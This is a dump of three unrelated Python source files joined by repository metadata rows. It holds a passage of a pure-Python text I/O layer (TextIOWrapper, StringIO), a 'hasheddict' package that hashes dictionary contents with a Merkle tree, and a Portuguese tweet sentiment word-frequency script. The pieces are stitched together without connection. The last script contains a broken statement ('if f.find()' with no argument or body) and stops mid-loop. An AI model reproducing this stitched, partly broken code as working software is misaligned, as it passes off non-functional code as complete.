"""Error setting of the decoder or encoder.
Subclasses should override."""
return None
io.TextIOBase.register(TextIOBase)
class IncrementalNewlineDecoder(codecs.IncrementalDecoder):
r"""Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece.
"""
def __init__(self, decoder, translate, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors=errors)
self.translate = translate
self.decoder = decoder
self.seennl = 0
self.pendingcr = False
def decode(self, input, final=False):
# decode input (with the eventual \r from a previous pass)
if self.decoder is None:
output = input
else:
output = self.decoder.decode(input, final=final)
if self.pendingcr and (output or final):
output = "\r" + output
self.pendingcr = False
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if output.endswith("\r") and not final:
output = output[:-1]
self.pendingcr = True
# Record which newlines are read
crlf = output.count('\r\n')
cr = output.count('\r') - crlf
lf = output.count('\n') - crlf
self.seennl |= (lf and self._LF) | (cr and self._CR) \
| (crlf and self._CRLF)
if self.translate:
if crlf:
output = output.replace("\r\n", "\n")
if cr:
output = output.replace("\r", "\n")
return output
def getstate(self):
if self.decoder is None:
buf = b""
flag = 0
else:
buf, flag = self.decoder.getstate()
flag <<= 1
if self.pendingcr:
flag |= 1
return buf, flag
def setstate(self, state):
buf, flag = state
self.pendingcr = bool(flag & 1)
if self.decoder is not None:
self.decoder.setstate((buf, flag >> 1))
def reset(self):
self.seennl = 0
self.pendingcr = False
if self.decoder is not None:
self.decoder.reset()
_LF = 1
_CR = 2
_CRLF = 4
@property
def newlines(self):
return (None,
"\n",
"\r",
("\r", "\n"),
"\r\n",
("\n", "\r\n"),
("\r", "\r\n"),
("\r", "\n", "\r\n")
)[self.seennl]
class TextIOWrapper(TextIOBase):
r"""Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding(False).
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
enabled. With this enabled, on input, the lines endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line separator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
_CHUNK_SIZE = 2048
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
# The write_through argument has no effect here since this
# implementation always writes through. The argument is present only
# so that the signature can match the signature of the C version.
def __init__(self, buffer, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._check_newline(newline)
if encoding is None:
try:
encoding = os.device_encoding(buffer.fileno())
except (AttributeError, UnsupportedOperation):
pass
if encoding is None:
try:
import locale
except ImportError:
# Importing locale may fail if Python is being built
encoding = "ascii"
else:
encoding = locale.getpreferredencoding(False)
if not isinstance(encoding, str):
raise ValueError("invalid encoding: %r" % encoding)
if not codecs.lookup(encoding)._is_text_encoding:
msg = ("%r is not a text encoding; "
"use codecs.open() to handle arbitrary codecs")
raise LookupError(msg % encoding)
if errors is None:
errors = "strict"
else:
if not isinstance(errors, str):
raise ValueError("invalid errors: %r" % errors)
self._buffer = buffer
self._decoded_chars = '' # buffer for text returned from decoder
self._decoded_chars_used = 0 # offset into _decoded_chars for read()
self._snapshot = None # info for reconstructing decoder state
self._seekable = self._telling = self.buffer.seekable()
self._has_read1 = hasattr(self.buffer, 'read1')
self._configure(encoding, errors, newline,
line_buffering, write_through)
def _check_newline(self, newline):
if newline is not None and not isinstance(newline, str):
raise TypeError("illegal newline type: %r" % (type(newline),))
if newline not in (None, "", "\n", "\r", "\r\n"):
raise ValueError("illegal newline value: %r" % (newline,))
def _configure(self, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
self._encoding = encoding
self._errors = errors
self._encoder = None
self._decoder = None
self._b2cratio = 0.0
self._readuniversal = not newline
self._readtranslate = newline is None
self._readnl = newline
self._writetranslate = newline != ''
self._writenl = newline or os.linesep
self._line_buffering = line_buffering
self._write_through = write_through
# don't write a BOM in the middle of a file
if self._seekable and self.writable():
position = self.buffer.tell()
if position != 0:
try:
self._get_encoder().setstate(0)
except LookupError:
# Sometimes the encoder doesn't exist
pass
# self._snapshot is either None, or a tuple (dec_flags, next_input)
# where dec_flags is the second (integer) item of the decoder state
# and next_input is the chunk of input bytes that comes next after the
# snapshot point. We use this to reconstruct decoder states in tell().
# Naming convention:
# - "bytes_..." for integer variables that count input bytes
# - "chars_..." for integer variables that count decoded characters
def __repr__(self):
result = "<{}.{}".format(self.__class__.__module__,
self.__class__.__qualname__)
try:
name = self.name
except AttributeError:
pass
else:
result += " name={0!r}".format(name)
try:
mode = self.mode
except AttributeError:
pass
else:
result += " mode={0!r}".format(mode)
return result + " encoding={0!r}>".format(self.encoding)
@property
def encoding(self):
return self._encoding
@property
def errors(self):
return self._errors
@property
def line_buffering(self):
return self._line_buffering
@property
def write_through(self):
return self._write_through
@property
def buffer(self):
return self._buffer
def reconfigure(self, *,
encoding=None, errors=None, newline=Ellipsis,
line_buffering=None, write_through=None):
"""Reconfigure the text stream with new parameters.
This also flushes the stream.
"""
if (self._decoder is not None
and (encoding is not None or errors is not None
or newline is not Ellipsis)):
raise UnsupportedOperation(
"It is not possible to set the encoding or newline of stream "
"after the first read")
if errors is None:
if encoding is None:
errors = self._errors
else:
errors = 'strict'
elif not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
if encoding is None:
encoding = self._encoding
else:
if not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if newline is Ellipsis:
newline = self._readnl
self._check_newline(newline)
if line_buffering is None:
line_buffering = self.line_buffering
if write_through is None:
write_through = self.write_through
self.flush()
self._configure(encoding, errors, newline,
line_buffering, write_through)
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return self._seekable
def readable(self):
return self.buffer.readable()
def writable(self):
return self.buffer.writable()
def flush(self):
self.buffer.flush()
self._telling = self._seekable
def close(self):
if self.buffer is not None and not self.closed:
try:
self.flush()
finally:
self.buffer.close()
@property
def closed(self):
return self.buffer.closed
@property
def name(self):
return self.buffer.name
def fileno(self):
return self.buffer.fileno()
def isatty(self):
return self.buffer.isatty()
def write(self, s):
'Write data, where s is a str'
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, str):
raise TypeError("can't write %s to text stream" %
s.__class__.__name__)
length = len(s)
haslf = (self._writetranslate or self._line_buffering) and "\n" in s
if haslf and self._writetranslate and self._writenl != "\n":
s = s.replace("\n", self._writenl)
encoder = self._encoder or self._get_encoder()
# XXX What if we were just reading?
b = encoder.encode(s)
self.buffer.write(b)
if self._line_buffering and (haslf or "\r" in s):
self.flush()
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
return length
def _get_encoder(self):
make_encoder = codecs.getincrementalencoder(self._encoding)
self._encoder = make_encoder(self._errors)
return self._encoder
def _get_decoder(self):
make_decoder = codecs.getincrementaldecoder(self._encoding)
decoder = make_decoder(self._errors)
if self._readuniversal:
decoder = IncrementalNewlineDecoder(decoder, self._readtranslate)
self._decoder = decoder
return decoder
# The following three methods implement an ADT for _decoded_chars.
# Text returned from the decoder is buffered here until the client
# requests it by calling our read() or readline() method.
def _set_decoded_chars(self, chars):
"""Set the _decoded_chars buffer."""
self._decoded_chars = chars
self._decoded_chars_used = 0
def _get_decoded_chars(self, n=None):
"""Advance into the _decoded_chars buffer."""
offset = self._decoded_chars_used
if n is None:
chars = self._decoded_chars[offset:]
else:
chars = self._decoded_chars[offset:offset + n]
self._decoded_chars_used += len(chars)
return chars
def _rewind_decoded_chars(self, n):
"""Rewind the _decoded_chars buffer."""
if self._decoded_chars_used < n:
raise AssertionError("rewind decoded_chars out of bounds")
self._decoded_chars_used -= n
def _read_chunk(self):
"""
Read and decode the next chunk of data from the BufferedReader.
"""
# The return value is True unless EOF was reached. The decoded
# string is placed in self._decoded_chars (replacing its previous
# value). The entire input chunk is sent to the decoder, though
# some of it may remain buffered in the decoder, yet to be
# converted.
if self._decoder is None:
raise ValueError("no decoder")
if self._telling:
# To prepare for tell(), we need to snapshot a point in the
# file where the decoder's input buffer is empty.
dec_buffer, dec_flags = self._decoder.getstate()
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
# Read a chunk, decode it, and put the result in self._decoded_chars.
if self._has_read1:
input_chunk = self.buffer.read1(self._CHUNK_SIZE)
else:
input_chunk = self.buffer.read(self._CHUNK_SIZE)
eof = not input_chunk
decoded_chars = self._decoder.decode(input_chunk, eof)
self._set_decoded_chars(decoded_chars)
if decoded_chars:
self._b2cratio = len(input_chunk) / len(self._decoded_chars)
else:
self._b2cratio = 0.0
if self._telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
self._snapshot = (dec_flags, dec_buffer + input_chunk)
return not eof
def _pack_cookie(self, position, dec_flags=0,
bytes_to_feed=0, need_eof=0, chars_to_skip=0):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
return (position | (dec_flags<<64) | (bytes_to_feed<<128) |
(chars_to_skip<<192) | bool(need_eof)<<256)
def _unpack_cookie(self, bigint):
rest, position = divmod(bigint, 1<<64)
rest, dec_flags = divmod(rest, 1<<64)
rest, bytes_to_feed = divmod(rest, 1<<64)
need_eof, chars_to_skip = divmod(rest, 1<<64)
return position, dec_flags, bytes_to_feed, need_eof, chars_to_skip
def tell(self):
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if not self._telling:
raise OSError("telling position disabled by next() call")
self.flush()
position = self.buffer.tell()
decoder = self._decoder
if decoder is None or self._snapshot is None:
if self._decoded_chars:
# This should never happen.
raise AssertionError("pending decoded text")
return position
# Skip backward to the snapshot point (see _read_chunk).
dec_flags, next_input = self._snapshot
position -= len(next_input)
# How many decoded characters have been used up since the snapshot?
chars_to_skip = self._decoded_chars_used
if chars_to_skip == 0:
# We haven't moved from the snapshot point.
return self._pack_cookie(position, dec_flags)
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
saved_state = decoder.getstate()
try:
# Fast search for an acceptable start point, close to our
# current pos.
# Rationale: calling decoder.decode() has a large overhead
# regardless of chunk size; we want the number of such calls to
# be O(1) in most situations (common decoders, sensible input).
# Actually, it will be exactly 1 for fixed-size codecs (all
# 8-bit codecs, also UTF-16 and UTF-32).
skip_bytes = int(self._b2cratio * chars_to_skip)
skip_back = 1
assert skip_bytes <= len(next_input)
while skip_bytes > 0:
decoder.setstate((b'', dec_flags))
# Decode up to temptative start point
n = len(decoder.decode(next_input[:skip_bytes]))
if n <= chars_to_skip:
b, d = decoder.getstate()
if not b:
# Before pos and no bytes buffered in decoder => OK
dec_flags = d
chars_to_skip -= n
break
# Skip back by buffered amount and reset heuristic
skip_bytes -= len(b)
skip_back = 1
else:
# We're too far ahead, skip back a bit
skip_bytes -= skip_back
skip_back = skip_back * 2
else:
skip_bytes = 0
decoder.setstate((b'', dec_flags))
# Note our initial start point.
start_pos = position + skip_bytes
start_flags = dec_flags
if chars_to_skip == 0:
# We haven't moved from the start point.
return self._pack_cookie(start_pos, start_flags)
# Feed the decoder one byte at a time. As we go, note the
# nearest "safe start point" before the current location
# (a point where the decoder has nothing buffered, so seek()
# can safely start from there and advance to this location).
bytes_fed = 0
need_eof = 0
# Chars decoded since `start_pos`
chars_decoded = 0
for i in range(skip_bytes, len(next_input)):
bytes_fed += 1
chars_decoded += len(decoder.decode(next_input[i:i+1]))
dec_buffer, dec_flags = decoder.getstate()
if not dec_buffer and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
start_pos += bytes_fed
chars_to_skip -= chars_decoded
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
if chars_decoded >= chars_to_skip:
break
else:
# We didn't get enough decoded data; signal EOF to get more.
chars_decoded += len(decoder.decode(b'', final=True))
need_eof = 1
if chars_decoded < chars_to_skip:
raise OSError("can't reconstruct logical file position")
# The returned cookie corresponds to the last safe start point.
return self._pack_cookie(
start_pos, start_flags, bytes_fed, need_eof, chars_to_skip)
finally:
decoder.setstate(saved_state)
def truncate(self, pos=None):
self.flush()
if pos is None:
pos = self.tell()
return self.buffer.truncate(pos)
def detach(self):
if self.buffer is None:
raise ValueError("buffer is already detached")
self.flush()
buffer = self._buffer
self._buffer = None
return buffer
def seek(self, cookie, whence=0):
def _reset_encoder(position):
"""Reset the encoder (merely useful for proper BOM handling)"""
try:
encoder = self._encoder or self._get_encoder()
except LookupError:
# Sometimes the encoder doesn't exist
pass
else:
if position != 0:
encoder.setstate(0)
else:
encoder.reset()
if self.closed:
raise ValueError("tell on closed file")
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if whence == SEEK_CUR:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to
# sync the underlying buffer with the current position.
whence = 0
cookie = self.tell()
elif whence == SEEK_END:
if cookie != 0:
raise UnsupportedOperation("can't do nonzero end-relative seeks")
self.flush()
position = self.buffer.seek(0, whence)
self._set_decoded_chars('')
self._snapshot = None
if self._decoder:
self._decoder.reset()
_reset_encoder(position)
return position
if whence != 0:
raise ValueError("unsupported whence (%r)" % (whence,))
if cookie < 0:
raise ValueError("negative seek position %r" % (cookie,))
self.flush()
# The strategy of seek() is to go back to the safe start point
# and replay the effect of read(chars_to_skip) from there.
start_pos, dec_flags, bytes_to_feed, need_eof, chars_to_skip = \
self._unpack_cookie(cookie)
# Seek back to the safe start point.
self.buffer.seek(start_pos)
self._set_decoded_chars('')
self._snapshot = None
# Restore the decoder to its state from the safe start point.
if cookie == 0 and self._decoder:
self._decoder.reset()
elif self._decoder or dec_flags or chars_to_skip:
self._decoder = self._decoder or self._get_decoder()
self._decoder.setstate((b'', dec_flags))
self._snapshot = (dec_flags, b'')
if chars_to_skip:
# Just like _read_chunk, feed the decoder and save a snapshot.
input_chunk = self.buffer.read(bytes_to_feed)
self._set_decoded_chars(
self._decoder.decode(input_chunk, need_eof))
self._snapshot = (dec_flags, input_chunk)
# Skip chars_to_skip of the decoded characters.
if len(self._decoded_chars) < chars_to_skip:
raise OSError("can't restore logical file position")
self._decoded_chars_used = chars_to_skip
_reset_encoder(cookie)
return cookie
def read(self, size=None):
self._checkReadable()
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
decoder = self._decoder or self._get_decoder()
if size < 0:
# Read everything.
result = (self._get_decoded_chars() +
decoder.decode(self.buffer.read(), final=True))
self._set_decoded_chars('')
self._snapshot = None
return result
else:
# Keep reading chunks until we have size characters to return.
eof = False
result = self._get_decoded_chars(size)
while len(result) < size and not eof:
eof = not self._read_chunk()
result += self._get_decoded_chars(size - len(result))
return result
def __next__(self):
self._telling = False
line = self.readline()
if not line:
self._snapshot = None
self._telling = self._seekable
raise StopIteration
return line
def readline(self, size=None):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
# Grab all the decoded text (we will rewind any extra bits later).
line = self._get_decoded_chars()
start = 0
# Make the decoder if it doesn't already exist.
if not self._decoder:
self._get_decoder()
pos = endpos = None
while True:
if self._readtranslate:
# Newlines are already translated, only search for \n
pos = line.find('\n', start)
if pos >= 0:
endpos = pos + 1
break
else:
start = len(line)
elif self._readuniversal:
# Universal newline search. Find any of \r, \r\n, \n
# The decoder ensures that \r\n are not split in two pieces
# In C we'd look for these in parallel of course.
nlpos = line.find("\n", start)
crpos = line.find("\r", start)
if crpos == -1:
if nlpos == -1:
# Nothing found
start = len(line)
else:
# Found \n
endpos = nlpos + 1
break
elif nlpos == -1:
# Found lone \r
endpos = crpos + 1
break
elif nlpos < crpos:
# Found \n
endpos = nlpos + 1
break
elif nlpos == crpos + 1:
# Found \r\n
endpos = crpos + 2
break
else:
# Found \r
endpos = crpos + 1
break
else:
# non-universal
pos = line.find(self._readnl)
if pos >= 0:
endpos = pos + len(self._readnl)
break
if size >= 0 and len(line) >= size:
endpos = size # reached length size
break
# No line ending seen yet - get more data'
while self._read_chunk():
if self._decoded_chars:
break
if self._decoded_chars:
line += self._get_decoded_chars()
else:
# end of file
self._set_decoded_chars('')
self._snapshot = None
return line
if size >= 0 and endpos > size:
endpos = size # don't exceed size
# Rewind _decoded_chars to just after the line ending we found.
self._rewind_decoded_chars(len(line) - endpos)
return line[:endpos]
@property
def newlines(self):
return self._decoder.newlines if self._decoder else None
class StringIO(TextIOWrapper):
"""Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def __init__(self, initial_value="", newline="\n"):
super(StringIO, self).__init__(BytesIO(),
encoding="utf-8",
errors="surrogatepass",
newline=newline)
# Issue #5645: make universal newlines semantics the same as in the
# C version, even under Windows.
if newline is None:
self._writetranslate = False
if initial_value is not None:
if not isinstance(initial_value, str):
raise TypeError("initial_value must be str or None, not {0}"
.format(type(initial_value).__name__))
self.write(initial_value)
self.seek(0)
def getvalue(self):
self.flush()
decoder = self._decoder or self._get_decoder()
old_state = decoder.getstate()
decoder.reset()
try:
return decoder.decode(self.buffer.getvalue(), final=True)
finally:
decoder.setstate(old_state)
def __repr__(self):
# TextIOWrapper tells the encoding in its repr. In StringIO,
# that's an implementation detail.
return object.__repr__(self)
@property
def errors(self):
return None
@property
def encoding(self):
return None
def detach(self):
# This doesn't make sense on StringIO.
self._unsupported("detach")
| apache-2.0 | 3,254,690,779,113,176,000 | 33.70235 | 86 | 0.567581 | false | 4.483711 | false | false | false |
JoEiner/hasheddict | hasheddict/__init__.py | 1 | 10088 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from zlib import crc32
from hashlib import sha256
from math import log, ceil
import collections
import threading
__all__ = ['HashedDict']
__version__ = "0.1.0"
__author__ = "Johannes Schreiner, [email protected]"
__credits__ = ["Johannes Schreiner"]
__url__ = "https://github.com/JoEiner/hasheddict"
__copyright__ = "(c) 2015 Johannes Schreiner"
__license__ = "GNU General Public License v3 or later (GPLv3+)"
class HashedDict(dict):
"""
A dictionary that provides cryptographic hashes of its contents.
See package documentation for usage instructions.
"""
def __init__(self, *args, **kwargs):
"""
Possible ways of instantiation:
HashedDict([algorithm[, trees_cache_size], ])
HashedDict([algorithm[, trees_cache_size], ]**kwargs)
HashedDict([algorithm[, trees_cache_size], ]iterable, **kwargs)
HashedDict([algorithm[, trees_cache_size], ]mapping, **kwargs)
@param algorithm: algorithm is a class that provides an interface
similar to hashlib.sha*() interface (see Lib/hashlib.py)
@type trees_cache_size: int
@param trees_cache_size: The number of internal trees the HashedDict buffers.
Raising this number increases memory usage, yet reduces
time consumption when the dictionary grows over its boundaries
Use only positive integers.
Examples::
>>> a = dict(one=1, two=2, three=3)
>>> b = dict(zip(['one', 'two', 'three'], [1, 2, 3]))
>>> c = dict([('two', 2), ('one', 1), ('three', 3)])
>>> d = dict({'three': 3, 'one': 1, 'two': 2})
>>> from hashlib import md5, sha512
>>> e = dict(md5, one=1, two=2, three=3)
>>> f = dict(1, sha512, zip(range(100000), reversed(range(100000))))
"""
dictargs = [arg for arg in args if isinstance(arg, collections.Iterable) or
isinstance(arg, collections.Mapping)]
if len(dictargs) > 1:
raise TypeError("HashedDict expected at most 1 iterable or mapping "
"argument, got %d" % len(args))
hashargs = [arg for arg in args if not isinstance(arg, collections.Iterable) and
not isinstance(arg, collections.Mapping)]
self.__hashalg = args[0] if len(hashargs) >= 1 else sha256
self.__trees_cache_size = args[1] if len(hashargs) >= 2 else 3
self.__key_to_hash = dict()
depth = self.__get_depth_for_length(0)
initial_tree = HashTree(self.__key_to_hash, self.__hashalg, depth)
initial_tree.start()
initial_tree.join()
self.__trees = {depth: initial_tree}
self.update(*dictargs, **kwargs)
def get_hash(self):
tree_nr = self.__get_depth_for_length(len(self))
return self.__trees[tree_nr].get_hash()
def __setitem__(self, key, value):
hash_value = self.__hash_item(key, value)
self.__key_to_hash[key] = hash_value
if key in self:
for tree in self.__trees.itervalues():
tree.delete(key, hash_value)
super(HashedDict, self).__setitem__(key, value)
for tree in self.__trees.itervalues():
tree.add(key, hash_value)
self.__manage_cached_trees()
def __delitem__(self, key):
self.__manage_cached_trees()
for tree in self.__trees.itervalues():
tree.delete(key, self.__key_to_hash[key])
del self.__key_to_hash[key]
super(HashedDict, self).__delitem__(key)
def update(self, *args, **kwargs):
if args:
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, "
"got %d" % len(args))
other = dict(args[0])
for key in other:
self[key] = other[key]
for key in kwargs:
self[key] = kwargs[key]
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def __manage_cached_trees(self):
dict_length = len(self)
curr_depth = self.__get_depth_for_length(dict_length)
range_start = max(0, curr_depth - (self.__trees_cache_size/2))
range_end = range_start + self.__trees_cache_size
allowed_trees = set(xrange(range_start, range_end))
existing_trees = set(self.__trees.keys())
deprecated_keys = existing_trees - allowed_trees
new_keys = allowed_trees - existing_trees
for tree_key in deprecated_keys:
del self.__trees[tree_key]
for tree_key in new_keys:
new_tree = HashTree(self.__key_to_hash,
self.__hashalg, tree_key)
new_tree.start()
self.__trees[tree_key] = new_tree
@staticmethod
def __get_depth_for_length(length):
if length == 0:
return 0
else:
return int(ceil(log(length, 2)))
def __hash_item(self, key, value):
return (self.__hashalg(self.__hashalg(repr(key)).digest() +
self.__hashalg(repr(value)).digest()).digest())
class HashTree(threading.Thread):
def __init__(self, key_to_hash, hashalg, tree_depth):
threading.Thread.__init__(self)
self.__key_to_hash = key_to_hash.copy()
self.__tree_depth = tree_depth
self.__hashalg = hashalg
def run(self):
self.__tree = self.__build_tree()
self.__leaf_hashes = self.__build_leaf_items()
self.__rehash_all()
def get_hash(self):
self.join()
return self.__tree[0][0]
def add(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
self.__leaf_hashes[position].append(hash_value)
self.__rehash(position)
def delete(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
while hash_value in self.__leaf_hashes[position]:
self.__leaf_hashes[position].remove(hash_value)
self.__rehash(position)
def __build_tree(self):
tree = []
for i in xrange(self.__tree_depth+1):
current_row = [None for j in xrange(1 << i)]
tree.append(current_row)
return tree
def __build_leaf_items(self):
leaf_count = 1 << self.__tree_depth
new_leaf_items = [[] for i in xrange(leaf_count)]
for key, hash_value in self.__key_to_hash.iteritems():
position = (crc32(key) & 0xffffffff) % leaf_count
new_leaf_items[position].append(hash_value)
return new_leaf_items
def __rehash_all(self):
self.__tree[-1] = [self.__hash_leaf(leaf_items) for leaf_items in self.__leaf_hashes]
for row_nr in xrange(self.__tree_depth,0,-1):
row = self.__tree[row_nr]
for current_position in xrange(0, (len(row)+1)/2):
self.__rehash_parent(row_nr, current_position)
def __rehash(self, leaf_position):
leaf_items = self.__leaf_hashes[leaf_position]
self.__tree[-1][leaf_position] = self.__hash_leaf(leaf_items)
lchild_pos = leaf_position
for row_nr in xrange(self.__tree_depth, 0, -1):
#current_position = self.__rehash_parent(row_nr, current_position)
rchild_pos = lchild_pos | (1 << (row_nr - 1))
lchild_pos = lchild_pos & ((1 << (row_nr - 1)) - 1)
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
def __hash_leaf(self, leaf_items):
leaf_items.sort()
hashalg = self.__hashalg()
for item in leaf_items:
hashalg.update(item)
return hashalg.digest()
def __rehash_parent(self, row_nr, element_pos):
lchild_pos = element_pos & ((1 << (row_nr - 1)) - 1)
rchild_pos = element_pos | (1 << (row_nr - 1))
#parent_pos = lchild_pos
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
#lchild_hash = children_row[lchild_pos]
#rchild_hash = children_row[rchild_pos]
#parent_row[parent_pos] = self.__hashalg(lchild_hash + \
# rchild_hash).digest()
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
if __name__ == '__main__':
pangram = HashedDict(pangram="The quick brown fox jumps over the lazy dog")
assert pangram.get_hash() == '\xe9|\xdcJ=\xda\x84\xbd\xa6\x8e\xea\x9c=\x16\x93' + \
'x\xb2\xff9\x83S!\xfbE\xbc\x0c\x83\xb8`H\x94\xa6'
hd1 = HashedDict()
empty_hash = hd1.get_hash()
assert empty_hash == "\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99" + \
"o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U"
hd1["key1"] = "value1"
new_hash = hd1.get_hash()
del hd1["key1"]
assert empty_hash == hd1.get_hash()
hd2 = HashedDict(key1="value1", key2="value2")
del hd2["key2"]
assert hd2.get_hash() == new_hash
del hd2["key1"]
assert hd2.get_hash() == empty_hash
hd3 = HashedDict()
assert hd3.get_hash() == empty_hash
hashList = []
for i in xrange(1026):
hashList.append(hd3.get_hash())
hd3[str(i)] = i
for i in xrange(1025, -1, -1):
del hd3[str(i)]
assert hashList[i] == hd3.get_hash()
print "all tests successful"
| gpl-3.0 | 3,286,080,142,900,720,000 | 33.19661 | 95 | 0.54322 | false | 3.56089 | false | false | false |
eriksonJAguiar/TCC-UENP-Codigos | My_codes/tools-sentiment/word_freq.py | 1 | 4759 | import nltk
import pandas as pd
import re
from googletrans import Translator
from unicodedata import normalize
def read_csv(file):
df1 = pd.DataFrame.from_csv('files_extern/%s.csv'%(file),sep=';',index_col=0,encoding ='ISO-8859-1')
df1 = df1.reset_index()
return df1
def write_csv(data,file):
df = pd.DataFrame(data)
df.to_csv('files_extern/'+file+'.csv', mode='w', sep=';',index=False, header=False,encoding='utf8')
def clear(dataframe):
new_df_tweet = []
new_df_sent = []
zipped = zip(dataframe['tweet'],dataframe['opiniao'])
for (df,opiniao) in zipped:
expr = re.sub(r"http\S+", "", df)
#expr = re.sub(r"[@#]\S+","",expr)
expr = normalize('NFKD',expr).encode('ASCII','ignore').decode('ASCII')
filtrado = [w for w in nltk.regexp_tokenize(expr.lower(),"[^0-9\W_]+") if not w in nltk.corpus.stopwords.words('portuguese')]
for f in filtrado:
if len(f) >= 2:
#print(f)
#print(opiniao)
new_df_tweet.append(f)
new_df_sent.append(opiniao)
new_df = pd.DataFrame()
new_df['tokens'] = new_df_tweet
new_df['sentimento'] = new_df_sent
return new_df
def convert_df(df):
new_df = []
for d in df:
if d == 'Positivo':
new_df.append(1)
elif d == 'Neutro':
new_df.append(0)
elif d == 'Negativo':
new_df.append(-1)
return new_df
def exlusivos(vet_neg,vet_neu,vet_pos):
ex_pos = []
ex_neg = []
ex_neu = []
tupla = zip(vet_neg,vet_neu,vet_pos)
for (neg,neu,pos) in tupla:
if not (neg in vet_pos or neg in vet_neu):
ex_neg.append(neg)
if not (neu in vet_neg or neu in vet_pos):
ex_neu.append(neu)
if not (pos in vet_neg or pos in vet_neu):
ex_pos.append(pos)
print(ex_neg)
print(ex_neu)
print(ex_pos)
return ex_neg, ex_neu, ex_pos
def bigram(frases,vet_neg, vet_neu,vet_pos):
bi_neg = []
bi_neu = []
bi_pos = []
for f in frases:
if f.find()
if __name__ == '__main__':
df_tweets = read_csv('dataset-portuguese')
df_tweets['opiniao'] = convert_df(df_tweets['opiniao'])
df_words = clear(df_tweets)
neg = df_words.loc[df_words['sentimento'] == -1]
neu = df_words.loc[df_words['sentimento'] == 0]
pos = df_words.loc[df_words['sentimento'] == 1]
neg_freq = nltk.FreqDist(neg['tokens'])
neu_freq = nltk.FreqDist(neu['tokens'])
pos_freq = nltk.FreqDist(pos['tokens'])
vet_neg = []
vet_neu = []
vet_pos = []
#neg_freq.plot(50, cumulative=False)
#neu_freq.plot(50, cumulative=False)
#pos_freq.plot(50, cumulative=False)
#print(neg_freq.most_common(30))
#print('------------------------')
#print(neu_freq.most_common(30))
#print('------------------------')
#print(pos_freq.most_common(30))
tupla = zip(neg_freq.most_common(len(neg)),neu_freq.most_common(len(neu)),pos_freq.most_common(len(pos)))
df_neg = pd.DataFrame()
df_neu = pd.DataFrame()
df_pos = pd.DataFrame()
words_neg = dict()
words_neu = dict()
words_pos = dict()
words_neg['pt'] = []
words_neg['en'] = []
words_neg['es'] = []
words_neu['pt'] = []
words_neu['en'] = []
words_neu['es'] = []
words_pos['pt'] = []
words_pos['en'] = []
words_pos['es'] = []
#neg_freq.plot(30, cumulative=False)
translator = Translator(service_urls=['translate.google.com','translate.google.com.br'])
for (ng,nu,ps) in tupla:
vet_neg.append(ng[0])
vet_neu.append(nu[0])
vet_pos.append(ps[0])
vet_neg, vet_neu,vet_pos = exlusivos(vet_neg,vet_neu,vet_pos)
tupla = zip(vet_neg[:50],vet_neu[:50],vet_pos[:50])
for (ng,nu,ps) in tupla:
words_neg['pt'].append(ng)
en=translator.translate(ng, dest='en').text
words_neg['en'].append(en)
words_neg['es'].append(translator.translate(en, dest='es').text)
words_neu['pt'].append(nu)
en=translator.translate(nu, dest='en').text
words_neu['en'].append(en)
words_neu['es'].append(translator.translate(en, dest='es').text)
words_pos['pt'].append(ps)
en=translator.translate(ps, dest='en').text
words_pos['en'].append(en)
